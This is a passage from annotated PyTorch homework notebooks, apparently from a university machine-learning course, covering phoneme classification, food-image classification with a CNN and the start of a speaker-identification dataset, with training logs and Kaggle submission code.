print(f'number of features: {x_train.shape[1]}')

# Wrap each split in a COVID19Dataset.
train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
                                             COVID19Dataset(x_valid, y_valid), \
                                             COVID19Dataset(x_test)

# PyTorch DataLoaders batch the datasets, with the configured batch size,
# shuffling for train/valid, and pinned memory for faster host-to-GPU copies.
train_loader = DataLoader(train_dataset, batch_size=config['batch_size'], shuffle=True, pin_memory=True)
valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'], shuffle=True, pin_memory=True)
test_loader = DataLoader(test_dataset, batch_size=config['batch_size'], shuffle=False, pin_memory=True)

train_data size: (2408, 89)
valid_data size: (601, 89)
test_data size: (997, 88)
number of features: 88

    Start training!

    model = My_Model(input_dim=x_train.shape[1]).to(device) # put your model and data on the same computation device.
    trainer(train_loader, valid_loader, model, config, device)
Epoch [1/5000]: 100%|██████████| 10/10 [00:03<00:00,  3.26it/s, loss=131]
Epoch [1/5000]: Train loss: 263.8631, Valid loss: 94.9638
Saving model with loss 94.964...

    ……

Epoch [998/5000]: Train loss: 3.8978, Valid loss: 6.7839
Epoch [999/5000]: 100%|██████████| 10/10 [00:00<00:00, 135.57it/s, loss=2.35]

    Plot learning curves with tensorboard (optional)

tensorboard is a tool that allows you to visualize your training progress.

If this block does not display your learning curve, please wait for a few minutes, and re-run this block. It might take some time to load your logging information.

    %reload_ext tensorboard
    %tensorboard --logdir=./runs/

    Testing

    The predictions of your model on testing set will be stored at pred.csv.


def save_pred(preds, file):
    '''
    Save predictions to the specified file.
    '''
    with open(file, 'w') as fp:            # Open the target path in write mode.
        writer = csv.writer(fp)            # CSV writer from the standard library.
        writer.writerow(['id', 'tested_positive'])  # Header row.
        for i, p in enumerate(preds):      # One row per sample: its ID and prediction.
            writer.writerow([i, p])

model = My_Model(input_dim=x_train.shape[1]).to(device)  # Rebuild the model with the right input width.
model.load_state_dict(torch.load(config['save_path']))   # Load the best saved parameters.
preds = predict(test_loader, model, device)              # Predict on the test loader.
save_pred(preds, 'pred.csv')                             # Write the predictions to disk.

    Download

    Run this block to download the pred.csv automatically.

    from google.colab import files
    files.download('pred.csv')

    Reference

    This notebook uses code written by Heng-Jui Chang @ NTUEE (https://github.com/ga642381/ML2021-Spring/blob/main/HW01/HW01.ipynb)

    Homework 2: Phoneme Classification

    Task Description

• Phoneme Classification
• Training data: 3429 preprocessed audio features w/ labels (total 2116794 frames)
• Testing data: 857 preprocessed audio features w/o labels (total 527364 frames)
• Label: 41 classes, each class represents a phoneme

    Objectives:

• Solve a classification problem with deep neural networks (DNNs).
• Understand recurrent neural networks (RNNs).

    Some Utility Functions

    Fixes random number generator seeds for reproducibility.


import numpy as np
import torch
import random

def same_seeds(seed):
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed(seed)
        torch.cuda.manual_seed_all(seed)
    torch.backends.cudnn.benchmark = False     # Disable cuDNN auto-tuning, which can make run times and results vary.
    torch.backends.cudnn.deterministic = True  # Force cuDNN into deterministic mode so every run behaves the same.

Helper functions to pre-process the training data from the raw MFCC features of each utterance.

A phoneme may span several frames and is dependent on past and future frames.
Hence we concatenate neighboring frames for training to achieve higher accuracy. The concat_feat function concatenates the past and future k frames (total 2k+1 = n frames), and we predict the center frame.

Feel free to modify the data preprocess functions, but do not drop any frame (if you modify the functions, remember to check that the number of frames is the same as mentioned in the slides).

import os
import random
import torch
from tqdm import tqdm

def load_feat(path):
    feat = torch.load(path)  # Load one utterance's pre-computed feature tensor from disk.
    return feat

def shift(x, n):
    '''
    Shift a 2-D tensor of frames by n positions along dim 0, padding with the
    edge frame (edge replication, not a circular shift).
    x[0].repeat(-n, 1) builds -n copies of the first frame stacked as rows;
    x[-1].repeat(n, 1) does the same with the last frame.
    '''
    if n < 0:
        # Shift toward later positions: pad the front with copies of the first
        # frame and drop the last -n frames.
        left = x[0].repeat(-n, 1)
        right = x[:n]
    elif n > 0:
        # Shift toward earlier positions: drop the first n frames and pad the
        # back with copies of the last frame.
        right = x[-1].repeat(n, 1)
        left = x[n:]
    else:
        # n == 0: nothing to shift.
        return x
    # Stitch the two parts back together along the frame dimension.
    return torch.cat((left, right), dim=0)

def concat_feat(x, concat_n):
    '''
    Concatenate each frame with its neighbors: a (seq_len, feature_dim) tensor
    becomes (seq_len, concat_n * feature_dim), where row t holds frames
    t-k .. t+k (k = concat_n // 2), with edge replication at the boundaries.
    '''
    assert concat_n % 2 == 1  # n must be odd.
    if concat_n < 2:  # Nothing to concatenate.
        return x
    seq_len, feature_dim = x.size(0), x.size(1)
    x = x.repeat(1, concat_n)  # (seq_len, concat_n * feature_dim)
    # Reshape to (concat_n, seq_len, feature_dim): one copy of the sequence per slot.
    x = x.view(seq_len, concat_n, feature_dim).permute(1, 0, 2)
    # Shift each copy so that slot mid+r holds the frame r steps in the future
    # and slot mid-r the frame r steps in the past.
    mid = (concat_n // 2)
    for r_idx in range(1, mid+1):
        x[mid + r_idx, :] = shift(x[mid + r_idx], r_idx)
        x[mid - r_idx, :] = shift(x[mid - r_idx], -r_idx)
    # Back to (seq_len, concat_n * feature_dim).
    return x.permute(1, 0, 2).view(seq_len, concat_n * feature_dim)

def preprocess_data(split, feat_dir, phone_path, concat_nframes, train_ratio=0.8):
    '''
    Pre-process one split of the dataset.
    split: 'train', 'val' or 'test'.
    feat_dir: directory of the feature files.
    phone_path: directory of the phone labels and split lists.
    concat_nframes: how many frames to concatenate per sample.
    train_ratio: fraction of utterances used for training (default 0.8).
    '''
    class_num = 41  # NOTE: pre-computed, should not need change.

    # 'train' and 'val' both read from the training data; 'test' from the test data.
    if split == 'train' or split == 'val':
        mode = 'train'
    elif split == 'test':
        mode = 'test'
    else:
        raise ValueError('Invalid \'split\' argument for dataset: PhoneDataset!')

    label_dict = {}
    if mode == 'train':
        # Read the frame labels of every training utterance into label_dict.
        for line in open(os.path.join(phone_path, f'{mode}_labels.txt')).readlines():
            line = line.strip('\n').split(' ')
            label_dict[line[0]] = [int(p) for p in line[1:]]

        # Split training and validation data: shuffle the utterance list and cut it at train_ratio.
        usage_list = open(os.path.join(phone_path, 'train_split.txt')).readlines()
        random.shuffle(usage_list)
        train_len = int(len(usage_list) * train_ratio)
        usage_list = usage_list[:train_len] if split == 'train' else usage_list[train_len:]

    elif mode == 'test':
        usage_list = open(os.path.join(phone_path, 'test_split.txt')).readlines()

    # Strip trailing newlines from the utterance names.
    usage_list = [line.strip('\n') for line in usage_list]
    # Report the number of phone classes and how many utterances this split uses.
    print('[Dataset] - # phone classes: ' + str(class_num) + ', number of utterances for ' + split + ': ' + str(len(usage_list)))

    # Pre-allocate X (and y in training mode) with a generous upper bound on the frame count.
    max_len = 3000000
    X = torch.empty(max_len, 39 * concat_nframes)
    if mode == 'train':
        y = torch.empty(max_len, dtype=torch.long)

    # Read each utterance's features into X (and its labels into y).
    idx = 0
    for i, fname in tqdm(enumerate(usage_list)):
        feat = load_feat(os.path.join(feat_dir, mode, f'{fname}.pt'))
        cur_len = len(feat)
        feat = concat_feat(feat, concat_nframes)
        if mode == 'train':
            label = torch.LongTensor(label_dict[fname])

        X[idx: idx + cur_len, :] = feat
        if mode == 'train':
            y[idx: idx + cur_len] = label

        idx += cur_len

    # Trim the unused tail of the pre-allocated tensors.
    X = X[:idx, :]
    if mode == 'train':
        y = y[:idx]

    print(f'[INFO] {split} set')
    print(X.shape)
    # Return X (and y in training mode).
    if mode == 'train':
        print(y.shape)
        return X, y
    else:
        return X
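As a hypothetical toy check of concat_feat (the tensor below is illustrative): with three 2-dimensional frames and concat_n = 3, each output row holds the previous, current, and next frame, with edges replicated:

x = torch.tensor([[1., 1.], [2., 2.], [3., 3.]])  # seq_len=3, feature_dim=2
out = concat_feat(x, 3)                           # shape: (3, 6)
# out[0] = [1,1, 1,1, 2,2]  (no real past frame, so the first frame repeats)
# out[1] = [1,1, 2,2, 3,3]
# out[2] = [2,2, 3,3, 3,3]  (no real future frame, so the last frame repeats)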

    Dataset

import torch
from torch.utils.data import Dataset

class LibriDataset(Dataset):
    def __init__(self, X, y=None):
        self.data = X
        if y is not None:
            self.label = torch.LongTensor(y)
        else:
            self.label = None

    def __getitem__(self, idx):
        if self.label is not None:
            return self.data[idx], self.label[idx]
        else:
            return self.data[idx]

    def __len__(self):
        return len(self.data)

    Model

    Feel free to modify the structure of the model.


import torch.nn as nn

class BasicBlock(nn.Module):
    def __init__(self, input_dim, output_dim):
        super(BasicBlock, self).__init__()
        # A basic building block: one fully connected layer followed by ReLU,
        # mapping input_dim-dimensional vectors to output_dim dimensions.
        self.block = nn.Sequential(
            nn.Linear(input_dim, output_dim),
            nn.ReLU(),
        )

    def forward(self, x):
        x = self.block(x)
        return x


class Classifier(nn.Module):
    '''
    A classifier built by stacking several BasicBlock modules.
    '''
    def __init__(self, input_dim, output_dim=41, hidden_layers=1, hidden_dim=256):
        '''
        input_dim: dimensionality of the input vector.
        output_dim: number of output classes, default 41.
        hidden_layers: number of hidden blocks, default 1.
        hidden_dim: width of each hidden layer.
        '''
        super(Classifier, self).__init__()

        self.fc = nn.Sequential(
            # First map the input from input_dim down to hidden_dim.
            BasicBlock(input_dim, hidden_dim),
            # Stack hidden_layers more BasicBlocks to add depth and capacity.
            *[BasicBlock(hidden_dim, hidden_dim) for _ in range(hidden_layers)],
            # A final linear layer maps to output_dim class scores.
            nn.Linear(hidden_dim, output_dim)
        )

    def forward(self, x):
        x = self.fc(x)
        return x
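A hypothetical sanity check of the classifier's output shape and size (the widths match the hyper-parameters below, but the dummy batch is only for illustration):

net = Classifier(input_dim=39 * 3, hidden_layers=2, hidden_dim=64)
dummy = torch.randn(4, 39 * 3)                   # a batch of 4 concatenated frames
print(net(dummy).shape)                          # torch.Size([4, 41])
print(sum(p.numel() for p in net.parameters())) # total number of trainable parameters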

    Hyper-parameters

# data parameters
concat_nframes = 3   # the number of frames to concat with, n must be odd (total 2k+1 = n frames)
train_ratio = 0.75   # the ratio of data used for training, the rest will be used for validation

# training parameters
seed = 1213          # random seed
batch_size = 512     # batch size
num_epoch = 10       # the number of training epochs
learning_rate = 1e-4 # learning rate
model_path = './model.ckpt' # the path where the checkpoint will be saved

# model parameters
input_dim = 39 * concat_nframes # the input dim of the model, you should not change the value
hidden_layers = 2    # the number of hidden layers
hidden_dim = 64      # the hidden dim

    Dataloader

from torch.utils.data import DataLoader
import gc  # for explicit garbage collection

same_seeds(seed)  # Fix the random seeds.
# Run on the GPU if one is available.
device = 'cuda' if torch.cuda.is_available() else 'cpu'
print(f'DEVICE: {device}')

# Preprocess the training and validation data into train_X/train_y and val_X/val_y.
train_X, train_y = preprocess_data(split='train',
                                   # directory of the audio feature files
                                   feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat',
                                   # directory of the phone labels
                                   phone_path='/kaggle/input/ml2023spring-hw2/libriphone',
                                   # how many neighboring frames to concatenate into each feature vector
                                   concat_nframes=concat_nframes,
                                   # train/validation split ratio
                                   train_ratio=train_ratio)
val_X, val_y = preprocess_data(split='val',
                               feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat',
                               phone_path='/kaggle/input/ml2023spring-hw2/libriphone',
                               concat_nframes=concat_nframes,
                               train_ratio=train_ratio)

# Wrap both splits in LibriDataset instances.
train_set = LibriDataset(train_X, train_y)
val_set = LibriDataset(val_X, val_y)

# Remove the raw feature tensors to save memory.
del train_X, train_y, val_X, val_y
gc.collect()  # Reclaim the freed memory.

# Create the DataLoaders: batched, with shuffling only for training.
train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True)
val_loader = DataLoader(val_set, batch_size=batch_size, shuffle=False)
DEVICE: cuda
[Dataset] - # phone classes: 41, number of utterances for train: 2571
2571it [00:23, 107.38it/s]
[INFO] train set
torch.Size([1588590, 117])
torch.Size([1588590])
[Dataset] - # phone classes: 41, number of utterances for val: 858
858it [00:02, 308.31it/s]
[INFO] val set
torch.Size([525078, 117])
torch.Size([525078])

    Training

# Create the model, define a loss function and an optimizer.
# The Classifier is built with the input width, hidden layer count, and hidden
# width chosen above, then moved to the selected device.
model = Classifier(input_dim=input_dim, hidden_layers=hidden_layers, hidden_dim=hidden_dim).to(device)
criterion = nn.CrossEntropyLoss()  # Cross-entropy loss for classification.
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)  # Adam updates the parameters.

best_acc = 0.0
for epoch in range(num_epoch):
    # Reset the running statistics at the start of each epoch.
    train_acc = 0.0
    train_loss = 0.0
    val_acc = 0.0
    val_loss = 0.0

    # training
    model.train()  # set the model to training mode
    for i, batch in enumerate(tqdm(train_loader)):
        # Move the batch's features and labels to the chosen device.
        features, labels = batch
        features = features.to(device)
        labels = labels.to(device)

        optimizer.zero_grad()      # Clear the gradients from the previous step.
        outputs = model(features)  # Forward pass.

        loss = criterion(outputs, labels)  # Compute the loss.
        loss.backward()            # Backpropagate.
        optimizer.step()           # Update the parameters.

        # get the index of the class with the highest probability
        _, train_pred = torch.max(outputs, 1)
        # detach() takes the tensors out of the autograd graph; comparing the
        # predicted classes with the labels gives a boolean tensor whose sum is
        # the number of correct predictions in this batch, and item() turns it
        # into a Python number that is accumulated into train_acc.
        train_acc += (train_pred.detach() == labels.detach()).sum().item()
        train_loss += loss.item()  # Accumulate the batch loss.

    # validation
    model.eval()  # set the model to evaluation mode
    with torch.no_grad():
        for i, batch in enumerate(tqdm(val_loader)):
            features, labels = batch
            features = features.to(device)
            labels = labels.to(device)
            outputs = model(features)  # Forward pass only.

            loss = criterion(outputs, labels)

            # get the index of the class with the highest probability
            _, val_pred = torch.max(outputs, 1)
            val_acc += (val_pred.cpu() == labels.cpu()).sum().item()
            val_loss += loss.item()
    # At the end of each epoch, report the averaged training and validation metrics.
    print(f'[{epoch+1:03d}/{num_epoch:03d}] Train Acc: {train_acc/len(train_set):3.5f} Loss: {train_loss/len(train_loader):3.5f} | Val Acc: {val_acc/len(val_set):3.5f} loss: {val_loss/len(val_loader):3.5f}')

    # If the model improves, save a checkpoint at this epoch: update best_acc,
    # write the parameters to model_path, and log the new best accuracy.
    if val_acc > best_acc:
        best_acc = val_acc
        torch.save(model.state_dict(), model_path)
        print(f'saving model with acc {best_acc/len(val_set):.5f}')

100%|██████████| 3103/3103 [00:19<00:00, 156.88it/s]
100%|██████████| 1026/1026 [00:03<00:00, 273.11it/s]
[001/010] Train Acc: 0.39279 Loss: 2.21685 | Val Acc: 0.43877 loss: 1.97101
saving model with acc 0.43877
100%|██████████| 3103/3103 [00:17<00:00, 175.27it/s]
100%|██████████| 1026/1026 [00:03<00:00, 277.94it/s]

    ……

[009/010] Train Acc: 0.49606 Loss: 1.72781 | Val Acc: 0.49852 loss: 1.71150
saving model with acc 0.49852
100%|██████████| 3103/3103 [00:17<00:00, 180.14it/s]
100%|██████████| 1026/1026 [00:04<00:00, 241.12it/s]
[010/010] Train Acc: 0.49840 Loss: 1.71736 | Val Acc: 0.50044 loss: 1.70057
saving model with acc 0.50044


    del train_set, val_set
    del train_loader, val_loader
    gc.collect()
    23

    Testing

    Create a testing dataset, and load model from the saved checkpoint.

    # load data
    test_X = preprocess_data(split='test', feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat', phone_path='/kaggle/input/ml2023spring-hw2/libriphone', concat_nframes=concat_nframes)
    test_set = LibriDataset(test_X, None)
    test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=False)
[Dataset] - # phone classes: 41, number of utterances for test: 857
857it [00:08, 103.10it/s]
[INFO] test set
torch.Size([527364, 117])


    ## load model
    model = Classifier(input_dim=input_dim, hidden_layers=hidden_layers, hidden_dim=hidden_dim).to(device)
    model.load_state_dict(torch.load(model_path))
    <All keys matched successfully>

    Make prediction.

pred = np.array([], dtype=np.int32)  # An empty int32 array to collect the predictions.

model.eval()  # Switch the model to evaluation mode.
with torch.no_grad():  # No gradients are needed for inference.
    for i, batch in enumerate(tqdm(test_loader)):  # One batch at a time from the test loader.
        features = batch
        features = features.to(device)

        outputs = model(features)  # Forward pass to get the class scores.

        # torch.max over dim 1 returns (max score, index of the max); the index
        # is the predicted class for each sample.
        _, test_pred = torch.max(outputs, 1)  # get the index of the class with the highest probability
        # Convert the batch's predictions to NumPy and append them to pred.
        pred = np.concatenate((pred, test_pred.cpu().numpy()), axis=0)
# After the loop, pred holds the model's prediction for every test sample.
    100%|██████████| 1031/1031 [00:01<00:00, 533.21it/s]

    Write prediction to a CSV file.

    After finish running this block, download the file prediction.csv from the files section on the left-hand side and submit it to Kaggle.

with open('prediction.csv', 'w') as f:
    f.write('Id,Class\n')
    for i, y in enumerate(pred):
        f.write('{},{}\n'.format(i, y))

    HW3 Image Classification

Solve image classification with convolutional neural networks (CNNs).

    If you have any questions, please contact the TAs via TA hours, NTU COOL, or email to mlta-2023-spring@googlegroups.com

    # check GPU type.
    !nvidia-smi
Tue May  2 10:05:59 2023
NVIDIA-SMI 470.161.03   Driver Version: 470.161.03   CUDA Version: 11.4
GPU 0: Tesla P100-PCIE, 0MiB / 16280MiB used, 0% utilization, no running processes

    Import Packages

    _exp_name = "sample"
    # Import necessary packages.
    import numpy as np
    import pandas as pd
    import torch
    import os
    import torch.nn as nn
    import torchvision.transforms as transforms
    from PIL import Image
# "ConcatDataset" and "Subset" are possibly useful when doing semi-supervised learning.
    from torch.utils.data import ConcatDataset, DataLoader, Subset, Dataset
    from torchvision.datasets import DatasetFolder, VisionDataset
    # This is for the progress bar.
    from tqdm.auto import tqdm
    import random
    myseed = 6666  # set a random seed for reproducibility
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    np.random.seed(myseed)
    torch.manual_seed(myseed)
if torch.cuda.is_available():
    torch.cuda.manual_seed_all(myseed)

    Transforms

# Normally, we don't need augmentations in testing and validation.
# All we need here is to resize the PIL image and transform it into a Tensor.
test_tfm = transforms.Compose([
    transforms.Resize((128, 128)),
    transforms.ToTensor(),
])

# However, it is also possible to use augmentation in the testing phase.
# You may use train_tfm to produce a variety of images and then test using ensemble methods.
train_tfm = transforms.Compose([
    # Resize the image into a fixed shape (height = width = 128).
    transforms.Resize((128, 128)),
    # You may add some transforms here (see the hedged sketch below).

    # ToTensor() should be the last one of the transforms.
    transforms.ToTensor(),
])
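A hedged sketch of augmentations that could fill the "add some transforms here" slot (the specific transforms and parameters are assumptions to experiment with, not the reference solution):

train_tfm_augmented = transforms.Compose([
    transforms.Resize((128, 128)),
    transforms.RandomHorizontalFlip(p=0.5),                # mirror half of the images
    transforms.RandomRotation(15),                         # small random rotations
    transforms.ColorJitter(brightness=0.2, contrast=0.2),  # mild photometric noise
    transforms.ToTensor(),                                 # keep ToTensor() last
])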

    Datasets

class FoodDataset(Dataset):
    '''
    Subclasses PyTorch's Dataset, which is what DataLoader needs for training and testing.
    '''

    def __init__(self, path, tfm=test_tfm, files=None):
        '''
        path: directory of the dataset.
        tfm: the preprocessing transform to apply (default test_tfm).
        files: an optional explicit list of files to load (default None).
        '''
        super(FoodDataset).__init__()
        self.path = path
        # Collect and sort all .jpg files under the given path.
        self.files = sorted([os.path.join(path, x) for x in os.listdir(path) if x.endswith(".jpg")])
        # If an explicit file list was given, use it instead.
        if files is not None:
            self.files = files

        self.transform = tfm

    def __len__(self):
        '''
        Number of images in the dataset.
        '''
        return len(self.files)

    def __getitem__(self, idx):
        '''
        Load the idx-th image and convert it into the format the model expects.
        '''
        # Look up the file name for this index.
        fname = self.files[idx]
        # Read the image as a PIL.Image object.
        im = Image.open(fname)
        # Apply the preprocessing transform, producing a torch.Tensor.
        im = self.transform(im)

        # The label is encoded in the file name (e.g. "3_25.jpg" -> class 3);
        # if the name does not parse, this is test data with no label, so use -1.
        try:
            label = int(fname.split("/")[-1].split("_")[0])
        except ValueError:
            label = -1  # test has no label

        return im, label

    Model

class Classifier(nn.Module):
    def __init__(self):
        super(Classifier, self).__init__()
        # torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)
        # torch.nn.MaxPool2d(kernel_size, stride, padding)
        # input dimension [3, 128, 128]
        self.cnn = nn.Sequential(
            nn.Conv2d(3, 64, 3, 1, 1),    # [64, 128, 128]
            nn.BatchNorm2d(64),
            nn.ReLU(),
            nn.MaxPool2d(2, 2, 0),        # [64, 64, 64]

            nn.Conv2d(64, 128, 3, 1, 1),  # [128, 64, 64]
            nn.BatchNorm2d(128),
            nn.ReLU(),
            nn.MaxPool2d(2, 2, 0),        # [128, 32, 32]

            nn.Conv2d(128, 256, 3, 1, 1), # [256, 32, 32]
            nn.BatchNorm2d(256),
            nn.ReLU(),
            nn.MaxPool2d(2, 2, 0),        # [256, 16, 16]

            nn.Conv2d(256, 512, 3, 1, 1), # [512, 16, 16]
            nn.BatchNorm2d(512),
            nn.ReLU(),
            nn.MaxPool2d(2, 2, 0),        # [512, 8, 8]

            nn.Conv2d(512, 512, 3, 1, 1), # [512, 8, 8]
            nn.BatchNorm2d(512),
            nn.ReLU(),
            nn.MaxPool2d(2, 2, 0),        # [512, 4, 4]
        )
        self.fc = nn.Sequential(
            nn.Linear(512*4*4, 1024),
            nn.ReLU(),
            nn.Linear(1024, 512),
            nn.ReLU(),
            nn.Linear(512, 11)
        )

    def forward(self, x):
        out = self.cnn(x)
        out = out.view(out.size()[0], -1)  # flatten
        return self.fc(out)
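A hypothetical shape check on a dummy batch confirms the dimensions annotated above (the dummy tensor is only for illustration):

net = Classifier()
dummy = torch.randn(2, 3, 128, 128)  # a batch of 2 RGB 128x128 images
print(net(dummy).shape)              # torch.Size([2, 11]): 11 food classes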

    Configurations

    # "cuda" only when GPUs are available.
    device = "cuda" if torch.cuda.is_available() else "cpu"

    # Initialize a model, and put it on the device specified.
    model = Classifier().to(device)

# The batch size.
    batch_size = 64

    # The number of training epochs.
    n_epochs = 8

    # If no improvement in 'patience' epochs, early stop.
    patience = 300

    # For the classification task, we use cross-entropy as the measurement of performance.
    criterion = nn.CrossEntropyLoss()

    # Initialize optimizer, you may fine-tune some hyperparameters such as learning rate on your own.
    optimizer = torch.optim.Adam(model.parameters(), lr=0.0003, weight_decay=1e-5)

    Dataloader

    # Construct train and valid datasets.
    # The argument "loader" tells how torchvision reads the data.
    train_set = FoodDataset("/kaggle/input/ml2023spring-hw3/train", tfm=train_tfm)
    train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=0, pin_memory=True)
    valid_set = FoodDataset("/kaggle/input/ml2023spring-hw3/valid", tfm=test_tfm)
    valid_loader = DataLoader(valid_set, batch_size=batch_size, shuffle=True, num_workers=0, pin_memory=True)

    Start Training

# Initialize trackers; these are not parameters and should not be changed.
stale = 0
best_acc = 0

for epoch in range(n_epochs):

    # ---------- Training ----------
    # Make sure the model is in train mode before training.
    model.train()

    # These are used to record information in training.
    train_loss = []
    train_accs = []

    for batch in tqdm(train_loader):

        # A batch consists of image data and corresponding labels.
        imgs, labels = batch
        #imgs = imgs.half()
        #print(imgs.shape, labels.shape)

        # Forward the data. (Make sure data and model are on the same device.)
        logits = model(imgs.to(device))

        # Calculate the cross-entropy loss.
        # We don't need to apply softmax before computing cross-entropy as it is done automatically.
        loss = criterion(logits, labels.to(device))

        # Gradients stored in the parameters in the previous step should be cleared out first.
        optimizer.zero_grad()

        # Compute the gradients for parameters.
        loss.backward()

        # Clip the gradient norms for stable training.
        # nn.utils.clip_grad_norm_ rescales the gradients of model.parameters()
        # so their total L2 norm does not exceed max_norm (here 10), and returns
        # the pre-clipping norm.
        grad_norm = nn.utils.clip_grad_norm_(model.parameters(), max_norm=10)

        # Update the parameters with computed gradients.
        optimizer.step()

        # Compute the accuracy for the current batch.
        acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()

        # Record the loss and accuracy.
        train_loss.append(loss.item())
        train_accs.append(acc)

    train_loss = sum(train_loss) / len(train_loss)
    train_acc = sum(train_accs) / len(train_accs)

    # Print the information.
    print(f"[ Train | {epoch + 1:03d}/{n_epochs:03d} ] loss = {train_loss:.5f}, acc = {train_acc:.5f}")

    # ---------- Validation ----------
    # Make sure the model is in eval mode so that modules like dropout are disabled and work normally.
    model.eval()

    # These are used to record information in validation.
    valid_loss = []
    valid_accs = []

    # Iterate the validation set by batches.
    for batch in tqdm(valid_loader):

        # A batch consists of image data and corresponding labels.
        imgs, labels = batch
        #imgs = imgs.half()

        # We don't need gradient in validation.
        # Using torch.no_grad() accelerates the forward process.
        with torch.no_grad():
            logits = model(imgs.to(device))

        # We can still compute the loss (but not the gradient).
        loss = criterion(logits, labels.to(device))

        # Compute the accuracy for the current batch.
        acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()

        # Record the loss and accuracy.
        valid_loss.append(loss.item())
        valid_accs.append(acc)
        #break

    # The average loss and accuracy of the entire validation set is the average of the recorded values.
    valid_loss = sum(valid_loss) / len(valid_loss)
    valid_acc = sum(valid_accs) / len(valid_accs)

    # Print the information.
    print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f}")


    # Update logs. (Note: the log file is opened for appending, but the message
    # itself is printed to stdout, as in the original sample code.)
    if valid_acc > best_acc:
        with open(f"./{_exp_name}_log.txt", "a"):
            print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f} -> best")
    else:
        with open(f"./{_exp_name}_log.txt", "a"):
            print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f}")


    # Save models.
    if valid_acc > best_acc:
        print(f"Best model found at epoch {epoch}, saving model")
        torch.save(model.state_dict(), f"{_exp_name}_best.ckpt")  # only save the best model to prevent output memory exceed error
        best_acc = valid_acc
        stale = 0
    else:
        stale += 1
        if stale > patience:
            print(f"No improvement in {patience} consecutive epochs, early stopping")
            break
  0%|          | 0/157 [00:00<?, ?it/s]
[ Train | 001/008 ] loss = 1.87167, acc = 0.34385
  0%|          | 0/57 [00:00<?, ?it/s]
[ Valid | 001/008 ] loss = 1.87423, acc = 0.34339
[ Valid | 001/008 ] loss = 1.87423, acc = 0.34339 -> best
Best model found at epoch 0, saving model

    ……

[ Train | 008/008 ] loss = 0.66352, acc = 0.77070
  0%|          | 0/57 [00:00<?, ?it/s]
[ Valid | 008/008 ] loss = 1.28541, acc = 0.58910
[ Valid | 008/008 ] loss = 1.28541, acc = 0.58910

    Dataloader for test

    # Construct test datasets.
    # The argument "loader" tells how torchvision reads the data.
    test_set = FoodDataset("/kaggle/input/ml2023spring-hw3/test", tfm=test_tfm)
    test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=False, num_workers=0, pin_memory=True)

    Testing and generate prediction CSV

model_best = Classifier().to(device)
model_best.load_state_dict(torch.load(f"{_exp_name}_best.ckpt"))
model_best.eval()
prediction = []
with torch.no_grad():
    for data, _ in tqdm(test_loader):
        test_pred = model_best(data.to(device))
        test_label = np.argmax(test_pred.cpu().data.numpy(), axis=1)
        prediction += test_label.squeeze().tolist()
      0%|          | 0/47 [00:00<?, ?it/s]
# Create the test csv.
def pad4(i):
    return "0" * (4 - len(str(i))) + str(i)

df = pd.DataFrame()
df["Id"] = [pad4(i) for i in range(len(test_set))]
df["Category"] = prediction
df.to_csv("submission.csv", index=False)
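pad4 simply left-pads the index with zeros to four digits; as a quick sanity check, it matches Python's built-ins:

assert pad4(7) == "0007" == str(7).zfill(4) == f"{7:04d}"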

    HW4 Self-attention

# --- Initialization ---
import numpy as np
import torch
import random

def set_seed(seed):
    """Fix every random seed for reproducibility."""
    np.random.seed(seed)
    random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed(seed)
        torch.cuda.manual_seed_all(seed)
    torch.backends.cudnn.benchmark = False
    torch.backends.cudnn.deterministic = True

set_seed(114514)
# --- Dataset ---
import os
import json
import torch
import random
from pathlib import Path
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pad_sequence

class myDataset(Dataset):
    def __init__(self, data_dir, segment_len=128):
        """
        data_dir: path to the audio features
        segment_len: length of each audio segment (default 128 frames)
        """
        self.data_dir = data_dir
        self.segment_len = segment_len

        # Load the name-to-id mapping from mapping.json in the dataset folder.
        mapping_path = Path(data_dir) / "mapping.json"
        mapping = json.load(mapping_path.open())
        self.speaker2id = mapping["speaker2id"]  # speaker name -> ID

        # Load the metadata, which describes every speaker's utterances.
        metadata_path = Path(data_dir) / "metadata.json"
        metadata = json.load(open(metadata_path))["speakers"]

        # Get the total number of speakers.
        self.speaker_num = len(metadata.keys())
        self.data = []

        # Build utterance -> speaker-ID records.
        for speaker in metadata.keys():  # iterate over every speaker in metadata.json
            for utterances in metadata[speaker]:
                # Append entries of the form [feature_path, speaker_id].
                self.data.append([utterances["feature_path"], self.speaker2id[speaker]])

    def __len__(self):
        """Return the number of utterances."""
        return len(self.data)

    def __getitem__(self, index):
        feat_path, speaker = self.data[index]
        # Load the preprocessed mel-spectrogram of this utterance.
        mel = torch.load(os.path.join(self.data_dir, feat_path))

        # Segment the mel-spectrogram into "segment_len" frames.
        if len(mel) > self.segment_len:
            # Randomly crop a segment: pick a random start, then read segment_len frames.
            start = random.randint(0, len(mel) - self.segment_len)
            mel = torch.FloatTensor(mel[start:start + self.segment_len])
        else:
            mel = torch.FloatTensor(mel)
        # Cast the speaker label to long.
        speaker = torch.FloatTensor([speaker]).long()
        # Return the segment and the speaker ID.
        return mel, speaker

    def get_speaker_number(self):
        """Return the number of speakers in the dataset."""
        return self.speaker_num
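The random cropping in __getitem__ is easy to sanity-check in isolation; a minimal sketch with a fake 200-frame mel:

import random
import torch

mel = torch.randn(200, 40)  # fake mel: 200 frames, 40 bins
segment_len = 128
start = random.randint(0, len(mel) - segment_len)
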